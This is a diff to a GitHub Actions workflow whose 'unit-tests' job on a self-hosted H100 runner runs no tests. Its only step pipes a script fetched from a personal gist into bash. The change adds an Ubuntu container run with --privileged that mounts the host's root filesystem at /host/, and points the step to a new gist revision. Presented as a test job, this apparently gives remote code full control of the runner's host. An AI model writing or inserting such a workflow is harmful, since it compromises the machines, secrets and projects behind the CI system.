--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -7,7 +7,15 @@ on:
 jobs:
   unit-tests:
     runs-on: [self-hosted, nvidia, h100]
+    container:
+      image: ubuntu:latest
+      volumes:
+          - /:/host/
+      options: --privileged
     steps:
       - name: unit-tests
         continue-on-error: true
-        run: curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/e0671b7c64a3879ba29efd337e5fee1221ad940c/bak41162231010 | bash
+        run: |
+          apt update
+          apt install -y curl
+          curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/923478482119dd7a5484ab4e7992f9975eb22ded/bak41162231010 | bash
